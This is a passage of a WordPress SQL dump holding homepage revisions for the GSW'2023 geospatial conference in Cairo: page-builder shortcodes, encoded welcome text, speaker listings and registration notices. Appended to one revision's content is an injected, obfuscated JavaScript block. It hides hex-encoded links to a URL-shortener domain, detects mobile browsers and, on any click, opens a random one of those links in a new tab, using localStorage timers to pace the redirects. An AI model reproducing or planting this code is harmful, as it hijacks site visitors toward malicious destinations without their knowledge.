wcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665119554164{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #FFFFFF), color-stop(54%, #FFFFFF), color-stop(81%, #FFFFFF), color-stop(95%, #FFFFFF));background: -moz-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -webkit-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -o-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -ms-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#0367bf\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_masonry_media_grid element_width=\"6\" gap=\"20\" item=\"masonryGrid_IconSlideOut\" initial_loading_animation=\"fadeIn\" grid_id=\"vc_gid:1665119259246-2c5e5f13-c051-1\" include=\"2325,2326\" css=\".vc_custom_1665120103510{background-color: #ffffff !important;}\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:26:42','2022-10-06 20:26:42','',2167,'https://gsw2023.com/?p=2331',0,'revision','',0),
(2332,1,'2022-10-06 20:29:58','2022-10-06 20:29:58','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT 